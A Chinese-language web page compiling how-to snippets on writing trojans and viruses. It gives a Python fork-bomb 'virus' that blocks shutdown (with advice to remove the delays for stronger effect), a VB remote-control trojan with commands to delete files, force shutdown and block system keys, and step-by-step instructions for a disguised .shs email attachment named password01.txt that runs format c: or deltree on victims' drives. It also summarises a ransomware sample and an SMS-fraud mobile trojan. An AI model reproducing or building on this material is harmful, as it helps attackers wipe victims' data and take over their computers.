python一句话木马_python自制木马程序

hacker|
176

python能写病毒或者木马什么的吗?

# 这是一个小病毒,名叫ComKiller(计算机杀手)

# 效果:运行约10秒后无法正常关机

# 注:把那两行 time.sleep(0.1) 去掉效果更好哦:)

import os

import signal

import ctypes

import time

import threading

from pathlib import Path

def help_sos():

cmdr = os.system("start python %s" % FileName)

def Error():

while True:

try:

help_sos()

except BaseException:

help_sos()

time.sleep(0.1)

signal.signal(signal.SIGTERM, help_sos)

FileName = Path(__file__).name

while True:

time.sleep(1)

T = threading.Thread(target = Error, args = ())

T.start()

#仅用于娱乐,干什么非法的事情和我无关!

木马怎么做 (举例)

使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是,在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口;

Case 5

屏蔽开始菜单;

Case 6

按照客户机端传过来的文件名或目录名,而删除它;

Case 7

屏蔽热启动键;

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。

这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中 *** ,是修改系统注册表的 *** 。

成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。

Python能不能写病毒

国家计算机病毒应急处理中心通过对互联网的监测发现,一种利用python语言编写的恶意木马程序出现。该恶意程序通过伪装成多款常用应用软件等进行传播,诱使计算机用户下载安装。

这个新型的勒索病毒叫Dablio,理论上可以感染下列文件类型,也就是你电脑中以下列名字作为后缀名的文件,全部打不开。

相关推荐:《Python入门教程》

看了上面的文件类型,我也服了。这做毒的比我还想的周到。合着有点用的文件全想感染。

我们分析发现,该恶意软件就是一款勒索软件,其具有以下功能:

一、木马会判断自身进程名是否为systern.exe。如果不是,则将自身复制为C:UsersPublicsystern.exe 并执行;

二、释放s.bat批处理脚本,关闭各种数据库和web服务及进程;

三、遍历受感染操作系统的所有盘符中的指定文件进行加密,加密后修改文件的扩展名为MyChemicalRomance4EVER;

四、木马会调用系统的wevtutil命令,对系统日志中的“系统”、“安全”和“应用程序”三部分日志内容进行清理,并删除自身;

五、使用AES对称算法进行加密;

另外,恶意木马程序完成加密后,会在操作系统中生成一个存有勒索信息的文本文件,提示并要求受感染的用户访问指定的Web网站支付一定的比特币(电子货币),系统中加密的文件才可以被解锁。

专家提醒:

针对这种情况,国家计算机病毒应急处理中心建议广大计算机用户采取如下防范措施:

(一)不要从陌生的网站下载应用程序。

(二)建议打开操作系统中防病毒软件的“实时监控”功能,对操作操作进行主动防御,这样可以之一时间监控未知病毒的入侵活动。

python可以做木马吗?

可以。不过做起来不容易,因为python是比较高级的语言调用系统底层的接口会通过其他工具等,过程比较长,容易被屏蔽,要底层一点的语言才更好。

怎么自己 *** 木马啊。

木马完全可以自制,你可以根据自己所需的作用来 *** 各种各样的木马

学木马先要会编程,你先把这个搞懂吧!

1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。

2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板

文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后

点击“浏览”按钮选择要插入的文件。

3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹

出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令

:start.exe

/m

format

c:/q

/autotest

/u

,点击“确定”,此时,内容栏中会显示

出命令内容。

4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一

个图标。

5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名

称)。点击“文件”菜单中的“更新”,然后关闭此对话框。

6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默

认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面

上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作

为附件发出。

7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文

所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对

象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st

art.exe

/m

deltree

/y

a:\*.*

c:\*.*

d:\*.*

则是将删除对方硬盘下所有文件(盘符

根据实际情况自定义);如果替换为:start.exe

/m

deltree

/y

c:\windows\system\*.*

则是删除对方c:\windows\system\目录底下的所有文件.(当

然大家可以改成其它的命令)

很简单,这样一个恶意的攻击程序被弄出来了!

看看这是什么病毒

木马病毒,

作用与短消息 *** S的用Python编写的木马程序!

这个病毒主体文件是个 Python 脚本,只能在支持 Python 的手机平台上运行。

这个脚本文件是嵌在一个 SIS 安装包中的。SIS 安装程序伪装成 “Icq_Python” 诱骗用户安装,并和正常程序一样,安装后程序图标会出现在菜单栏中,并生成如下文件:

!:\system\apps\Icq_reggerNEW\Icq_reggerNEW.app

!:\system\apps\Icq_reggerNEW\default.py

!:\system\apps\Icq_reggerNEW\Icq_reggerNEW.rsc

!:\system\libs\keypress.pyd

!:\system\libs\inbox.pyd

!:\system\libs\appswitch.pyd

其中三个 pyd 文件是病毒脚本用到的导入模块。

当用户点击程序图标运行时,病毒脚本文件 default.py 就会被执行,其行为如下:

a)持续向一个指定号码发送短信;

b)删除收件箱中来自此指定号码的回复短信;

这样用户的手机费就在毫无察觉的情况下被骗取,号码对应的服务商就可以从中牟取暴利。马上查了下话费,没事!

0条大神的评论

发表评论